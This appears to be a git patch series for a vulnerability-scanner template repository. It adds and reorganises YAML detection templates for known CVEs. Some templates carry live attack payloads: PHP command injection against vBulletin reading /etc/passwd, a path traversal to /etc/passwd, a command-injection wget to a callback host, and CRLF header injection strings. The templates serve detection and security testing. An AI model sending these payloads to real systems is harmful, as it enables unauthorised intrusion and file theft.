b/vulnerabilities/other/simple-employee-rce.yaml similarity index 100% rename from cves/2019/CVE-2019-20183.yaml rename to vulnerabilities/other/simple-employee-rce.yaml From f7b34c07c888091f805b98fd856e714a7fa751f6 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Sep 2021 23:33:16 +0700 Subject: [PATCH 2644/4083] Create remkon-device-manager-detect.yaml --- .../remkon-device-manager-detect.yaml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/remkon-device-manager-detect.yaml diff --git a/technologies/remkon-device-manager-detect.yaml b/technologies/remkon-device-manager-detect.yaml new file mode 100644 index 0000000000..1b541fad52 --- /dev/null +++ b/technologies/remkon-device-manager-detect.yaml @@ -0,0 +1,24 @@ +id: remkon-device-manager-detect + +info: + name: Remkon Device Manager Detected + author: pikpikcu + severity: info + tags: remkon,tech + +requests: + - method: GET + path: + - '{{BaseURL}}/login.php' + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "Remkon Device Manager" + - "NASCENT Technology, LLC." From 553772ab8afab83b9978ebd1e1034e8d4d4e7980 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 30 Sep 2021 23:49:10 +0700 Subject: [PATCH 2645/4083] Create skycaiji-install.yaml --- misconfiguration/skycaiji-install.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 misconfiguration/skycaiji-install.yaml diff --git a/misconfiguration/skycaiji-install.yaml b/misconfiguration/skycaiji-install.yaml new file mode 100644 index 0000000000..9154469449 --- /dev/null +++ b/misconfiguration/skycaiji-install.yaml @@ -0,0 +1,25 @@ +id: skycaiji-install + +info: + name: SkyCaiji Exposed Installation + author: pikpikcu + severity: high + tags: tech,skycaiji,storage + +requests: + - method: GET + path: + - '{{BaseURL}}/index.php?s=/install/index/index' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '蓝天采集器 SkyCaiji 安装' + - 'https://www.skycaiji.com' + condition: and + + - type: status + status: + - 200 From 3878138bfee04561cc5e7b82bc1f86a035a15ac4 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 12:52:05 -0400 Subject: [PATCH 2646/4083] * Added Host headers where needed (validated via disclosures/posts) * Added CVE simple-employee-rce.yaml --- cves/2019/CVE-2019-16759.yaml | 5 +- cves/2019/CVE-2019-17538.yaml | 49 ++++++++++--------- cves/2020/CVE-2020-17496.yaml | 5 +- misconfiguration/put-method-enabled.yaml | 3 ++ vulnerabilities/other/mirai-unknown-rce.yaml | 1 + .../other/simple-employee-rce.yaml | 14 ++++-- 6 files changed, 45 insertions(+), 32 deletions(-) diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 7917672a21..28a33d2049 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -1,10 +1,10 @@ id: CVE-2019-16759 info: - name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass + name: RCE in vBulletin v5.0.0-v5.5.4 fix bypass author: madrobot severity: critical - reference: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/ + reference: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vbulletin-remote-code-execution-cve-2020-7373/ tags: cve,cve2019,vbulletin,rce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -17,6 +17,7 @@ requests: - raw: - | POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo(); diff --git a/cves/2019/CVE-2019-17538.yaml b/cves/2019/CVE-2019-17538.yaml index a1a7023154..8fbe69c719 100644 --- a/cves/2019/CVE-2019-17538.yaml +++ b/cves/2019/CVE-2019-17538.yaml @@ -1,29 +1,30 @@ -id: CVE-2019-17538 -info: - name: Jnoj Directory Traversal for file reading(LFI) - author: pussycat0x - severity: high - reference: https://github.com/shi-yang/jnoj/issues/53 - tags: cve,cve2019,jnoj,lfi - +id: CVE-2019-17538 +info: + name: Jnoj arbitrary local file inclusion (LFI) + author: pussycat0x + severity: high + reference: https://github.com/shi-yang/jnoj/issues/53 + tags: cve,cve2019,jnoj,lfi + classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2019-17538 cwe-id: CWE-22 - description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has Directory Traversal for file reading via the web/polygon/problem/viewfile?id=1&name=../ substring." -requests: - - raw: - - | - GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 - Content-Type: application/x-www-form-urlencoded - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body + description: "Jiangnan Online Judge (aka jnoj) 0.8.0 has directory traversal (LFI) vulnerability via web/polygon/problem/viewfile?id=1&name=../" +requests: + - raw: + - | + GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index d6a5b88323..ba6b5d66be 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -5,7 +5,7 @@ info: severity: critical reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed description: | - vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. + vBulletin 5.5.4 through 5.6.2 allow remote command execution (RCE) via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. tags: cve,cve2020,vbulletin,rce classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H @@ -17,6 +17,7 @@ requests: - raw: - | POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" @@ -29,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index b6ed7e48e9..7a136bdd94 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -5,18 +5,21 @@ info: author: xElkomy severity: high reference: https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled + description: The PUT method is enabled on the web server, allowing for arbitrary file uploads. tags: injection requests: - raw: - | PUT /testing-put.txt HTTP/1.1 + Host: {{Hostname}} Content-Type: text/plain {{randstr}} - | GET /testing-put.txt HTTP/1.1 + Host: {{Hostname}} Content-Type: text/plain req-condition: true diff --git a/vulnerabilities/other/mirai-unknown-rce.yaml b/vulnerabilities/other/mirai-unknown-rce.yaml index bb1ef6443a..88176d592c 100644 --- a/vulnerabilities/other/mirai-unknown-rce.yaml +++ b/vulnerabilities/other/mirai-unknown-rce.yaml @@ -13,6 +13,7 @@ requests: - raw: - | POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded key=';`wget http://{{interactsh-url}}`;# diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/vulnerabilities/other/simple-employee-rce.yaml index f965f9f0b6..62e3523df0 100644 --- a/vulnerabilities/other/simple-employee-rce.yaml +++ b/vulnerabilities/other/simple-employee-rce.yaml @@ -1,11 +1,17 @@ -id: simple-employee-rce +id: CVE-2019-20183 info: - name: Simple Employee Records System 1.0 RCE + name: Simple Employee Records System 1.0 arbitrary file upload + description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE. author: pikpikcu - severity: critical + severity: high reference: https://www.exploit-db.com/exploits/49596 - tags: rce,intrusive + classification: + cvess-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cwe-id: CWE-434 + cve-id: CVE-2019-20183 + tags: rce,intrusive,cve,upload,cve2019 requests: - raw: From c9a374bed56f05a9ac58328900449c82aa08eaa9 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 13:06:46 -0400 Subject: [PATCH 2647/4083] renamed: simple-employee-rce.yaml -> ../../cves/2019/CVE-2019-20183.yaml --- .../simple-employee-rce.yaml => cves/2019/CVE-2019-20183.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/other/simple-employee-rce.yaml => cves/2019/CVE-2019-20183.yaml (100%) diff --git a/vulnerabilities/other/simple-employee-rce.yaml b/cves/2019/CVE-2019-20183.yaml similarity index 100% rename from vulnerabilities/other/simple-employee-rce.yaml rename to cves/2019/CVE-2019-20183.yaml From 5c802b177246e75b4e657f32b33516a9f1877a41 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 30 Sep 2021 12:19:17 -0500 Subject: [PATCH 2648/4083] Create CVE-2021-41826.yaml Add CVE-2021-41826, PlaceOS 1.2109.1 - Open Redirection --- cves/2021/CVE-2021-41826.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 cves/2021/CVE-2021-41826.yaml diff --git a/cves/2021/CVE-2021-41826.yaml b/cves/2021/CVE-2021-41826.yaml new file mode 100644 index 0000000000..1002552521 --- /dev/null +++ b/cves/2021/CVE-2021-41826.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-41826 + +info: + name: PlaceOS 1.2109.1 - Open Redirection + author: geeknik + severity: low + description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect + reference: + - https://github.com/PlaceOS/auth/issues/36 + - https://www.exploit-db.com/exploits/50359 + - https://nvd.nist.gov/vuln/detail/CVE-2021-41826 + tags: cve,cve2021,placeos,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/auth/logout?continue=//example.com" + + matchers-condition: and + matchers: + + - type: status + status: + - 302 + - 301 + + - type: regex + part: header + words: + - '(?mi)(?:Location\s*?:\s*?)((?:https?:\/\/|\/\/?))?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*' From 4065f6a493ba11d13c08a7d75d32892241beec37 Mon Sep 17 00:00:00 2001 From: Rizwan Syed <78642744+mr-rizwan-syed@users.noreply.github.com> Date: Thu, 30 Sep 2021 23:15:18 +0530 Subject: [PATCH 2649/4083] Update wordpress-accessible-wpconfig.yaml --- vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml index 9a5ea5ef29..57234bca1d 100644 --- a/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml +++ b/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml @@ -1,7 +1,7 @@ id: wordpress-accessible-wpconfig info: name: WordPress accessible wp-config - author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo + author: Kiblyn11,zomsop82,madrobot,geeknik,daffainfo,r12w4n severity: high tags: wordpress,backups @@ -24,6 +24,7 @@ requests: - '{{BaseURL}}/wp-config-backup.txt' - '{{BaseURL}}/wp-config.php.save' - '{{BaseURL}}/wp-config.php~' + - '{{BaseURL}}/wp-config.php-backup' - '{{BaseURL}}/wp-config.php.orig' - '{{BaseURL}}/wp-config.php.original' - '{{BaseURL}}/_wpeprivate/config.json' @@ -34,7 +35,7 @@ requests: - type: word words: - DB_NAME - - WPENGINE_ACCOUNT + - DB_PASSWORD part: body - type: status status: From 1ec2c9107b381b100fce3f17c767c676e5f96f64 Mon Sep 17 00:00:00 2001 From: Rizwan Syed <78642744+mr-rizwan-syed@users.noreply.github.com> Date: Thu, 30 Sep 2021 23:35:10 +0530 Subject: [PATCH 2650/4083] Create aws-s3-access-key-leak.yaml --- misconfiguration/aws-s3-access-key-leak.yaml | 21 ++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 misconfiguration/aws-s3-access-key-leak.yaml diff --git a/misconfiguration/aws-s3-access-key-leak.yaml b/misconfiguration/aws-s3-access-key-leak.yaml new file mode 100644 index 0000000000..50ed2ada6d --- /dev/null +++ b/misconfiguration/aws-s3-access-key-leak.yaml @@ -0,0 +1,21 @@ +id: aws-s3-access-key-leak + +info: + name: AWS S3 KEYS + author: Rizwan Syed @r12w4n + severity: high + tags: aws,s3,bucket,tech + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-config.php-backup' + - "{{BaseURL}}/%c0" + + matchers-condition: and + matchers: + - type: word + words: + - 'access-key-id' + - 'secret-access-key' + part: body From 784d9560be9d74f416834267961a97504ed1e7b4 Mon Sep 17 00:00:00 2001 From: sullo Date: Thu, 30 Sep 2021 14:26:37 -0400 Subject: [PATCH 2651/4083] Fix CVSS score incorrectly changed cvss score --- cves/2020/CVE-2020-29453.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index e097bb73ef..635ecf4a94 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -8,8 +8,8 @@ info: reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 cve-id: CVE-2020-29453 cwe-id: CWE-22 From c0003f87317ec8ffcc645e1e8706c5b95c9fe423 Mon Sep 17 00:00:00 2001 From: sullo Date: Thu, 30 Sep 2021 14:27:12 -0400 Subject: [PATCH 2652/4083] Update CVE-2020-29453.yaml --- cves/2020/CVE-2020-29453.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-29453.yaml b/cves/2020/CVE-2020-29453.yaml index 635ecf4a94..2ad29496d5 100644 --- a/cves/2020/CVE-2020-29453.yaml +++ b/cves/2020/CVE-2020-29453.yaml @@ -3,13 +3,13 @@ id: CVE-2020-29453 info: name: Pre-Auth Limited Arbitrary File Read in Jira Server author: dwisiswant0 - severity: high + severity: medium description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check. reference: https://jira.atlassian.com/browse/JRASERVER-72014 tags: cve,cve2020,atlassian,jira,lfi classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2020-29453 cwe-id: CWE-22 From 3c012b137d147ca0369a5f249add6ea04651b219 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:35:17 -0400 Subject: [PATCH 2653/4083] Break CVE-2016-4975 into its own template --- cves/2016/CVE-2016-4975.yml | 25 +++++++++++++++++++++ vulnerabilities/generic/crlf-injection.yaml | 1 - 2 files changed, 25 insertions(+), 1 deletion(-) create mode 100644 cves/2016/CVE-2016-4975.yml diff --git a/cves/2016/CVE-2016-4975.yml b/cves/2016/CVE-2016-4975.yml new file mode 100644 index 0000000000..bdbee8848e --- /dev/null +++ b/cves/2016/CVE-2016-4975.yml @@ -0,0 +1,25 @@ +id: CVE-2016-4975 + +info: + name: Apache mod_userdir CRLF injection + author: melbadry9,nadino,xElkomy,sullo + severity: low + description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. + tags: crlf,generic,cves,cve2016 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-4975 + cwe-id: CWE-93 + +requests: + - method: GET + path: + - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" + + stop-at-first-match: true + matchers: + - type: regex + regex: + - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' + part: header diff --git a/vulnerabilities/generic/crlf-injection.yaml b/vulnerabilities/generic/crlf-injection.yaml index b06abf0aa2..2fe6563ca0 100644 --- a/vulnerabilities/generic/crlf-injection.yaml +++ b/vulnerabilities/generic/crlf-injection.yaml @@ -16,7 +16,6 @@ requests: - "{{BaseURL}}/%0ASet-Cookie:crlfinjection=crlfinjection" - "{{BaseURL}}/%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection" - "{{BaseURL}}/%0ASet-Cookie%3Acrlfinjection/.." # Apache - - "{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection" # CVE-2016-4975 - "{{BaseURL}}/?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection" - "{{BaseURL}}/?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection" From d34e6c1145647903642c273b1a44705e2a69b79b Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:38:59 -0400 Subject: [PATCH 2654/4083] Add information for CVE-2010-1870 --- vulnerabilities/lsoft/listserv_maestro_rce.yaml | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml index 56b6d5f00f..75e15e4977 100644 --- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml +++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml @@ -1,14 +1,19 @@ -id: maestro-unauth-rce +id: CVE-2010-1870 info: name: ListSERV Maestro <= 9.0-8 RCE author: b0yd severity: info - description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. + description: Struts-based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8. reference: - https://www.securifera.com/advisories/sec-2020-0001/ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt - tags: rce,listserv,ognl + tags: rce,listserv,ognl,cves,cve2010 + classification: + cvss-metrics: AV:N/AC:L/Au:N/C:N/I:P/A:N + cvss-score: 5.0 + cve-id: CVE-2010-1870 + cwe-id: CWE-917 requests: - method: GET @@ -22,4 +27,4 @@ requests: - 'LISTSERV Maestro\s+9\.0-[123456780]' - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - - 'Administration Hub [5678]' \ No newline at end of file + - 'Administration Hub [5678]' From 7adfd01163a12ec99a526c6cf9dc6cc667cb1a65 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:39:45 -0400 Subject: [PATCH 2655/4083] Moving listserv_maestro_rce.yaml to cves folder --- .../listserv_maestro_rce.yaml => cves/2010/CVE-2010-1870.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename vulnerabilities/lsoft/listserv_maestro_rce.yaml => cves/2010/CVE-2010-1870.yaml (100%) diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/cves/2010/CVE-2010-1870.yaml similarity index 100% rename from vulnerabilities/lsoft/listserv_maestro_rce.yaml rename to cves/2010/CVE-2010-1870.yaml From 37920b7a888956f88d0b1bd2151a77c95404df9b Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:42:07 -0400 Subject: [PATCH 2656/4083] Add CVE information --- network/openssh5.3-detect.yaml | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/network/openssh5.3-detect.yaml b/network/openssh5.3-detect.yaml index 1bfb60d273..a43f9a10b5 100644 --- a/network/openssh5.3-detect.yaml +++ b/network/openssh5.3-detect.yaml @@ -1,15 +1,20 @@ -id: openssh5.3-detect +id: CVE-2016-6210 info: name: OpenSSH 5.3 Detection author: iamthefrogy - severity: low + severity: medium tags: network,openssh description: OpenSSH 5.3 is vulnerable to username enumeration and DoS vulnerabilities. reference: - http://seclists.org/fulldisclosure/2016/Jul/51 - https://security-tracker.debian.org/tracker/CVE-2016-6210 - http://openwall.com/lists/oss-security/2016/08/01/2 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 + cve-id: CVE-2016-6210 + cwe-id: CWE-200 network: - host: From 0c4dd95bf65ebd5237b10c8c91993d3200e1aede Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:43:00 -0400 Subject: [PATCH 2657/4083] Move openssh5.3-detect.yaml to cves/2016/CVE-2016-6210.yaml --- network/openssh5.3-detect.yaml => cves/2016/CVE-2016-6210.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename network/openssh5.3-detect.yaml => cves/2016/CVE-2016-6210.yaml (100%) diff --git a/network/openssh5.3-detect.yaml b/cves/2016/CVE-2016-6210.yaml similarity index 100% rename from network/openssh5.3-detect.yaml rename to cves/2016/CVE-2016-6210.yaml From a28eb3f3e99ecec5b276ab2b232ddd597002cd03 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:48:27 -0400 Subject: [PATCH 2658/4083] Add information for CVE-2001-1473 --- network/deprecated-sshv1-detection.yaml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/network/deprecated-sshv1-detection.yaml b/network/deprecated-sshv1-detection.yaml index c8dbbcea18..558f27f83f 100644 --- a/network/deprecated-sshv1-detection.yaml +++ b/network/deprecated-sshv1-detection.yaml @@ -1,14 +1,19 @@ -id: deprecated-sshv1-detection +id: CVE-2001-1473 info: name: Deprecated SSHv1 Protocol Detection author: iamthefrogy - severity: medium - tags: network,ssh,openssh + severity: high + tags: network,ssh,openssh,cves,cves2001 description: SSHv1 is deprecated and has known cryptographic issues. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 + classification: + cvss-metrics: 7.4 + cvss-score: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cve-id: CVE-2001-1473 + cwe-id: CWE-310 network: - host: From f1f6fbe26f62768a709f04840c061a3adb4e0d63 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:49:47 -0400 Subject: [PATCH 2659/4083] Move deprecated-sshv1-detection.yaml to 2001/CVE-2001-1473.yaml --- .../2001/CVE-2001-1473.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename network/deprecated-sshv1-detection.yaml => cves/2001/CVE-2001-1473.yaml (100%) diff --git a/network/deprecated-sshv1-detection.yaml b/cves/2001/CVE-2001-1473.yaml similarity index 100% rename from network/deprecated-sshv1-detection.yaml rename to cves/2001/CVE-2001-1473.yaml From 9f04b0abd8b2e82cb0e31b0f9316ec47de8c6d83 Mon Sep 17 00:00:00 2001 From: Sullo Date: Thu, 30 Sep 2021 15:56:52 -0400 Subject: [PATCH 2660/4083] Fix field names vs values --- cves/2001/CVE-2001-1473.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2001/CVE-2001-1473.yaml b/cves/2001/CVE-2001-1473.yaml index 558f27f83f..476fa47cd5 100644 --- a/cves/2001/CVE-2001-1473.yaml +++ b/cves/2001/CVE-2001-1473.yaml @@ -10,8 +10,8 @@ info: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 classification: - cvss-metrics: 7.4 - cvss-score: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.4 + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N cve-id: CVE-2001-1473 cwe-id: CWE-310 From 278367597ec4ca9bcda1e5586687db3915681c08 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 30 Sep 2021 19:57:03 +0000 Subject: [PATCH 2661/4083] Auto Generated Templates Stats [Thu Sep 30 19:57:03 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1567 +++++++++++++++++++++--------------------- TOP-10.md | 8 +- 3 files changed, 789 insertions(+), 788 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 66bc89f97e..df18b61cf9 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ 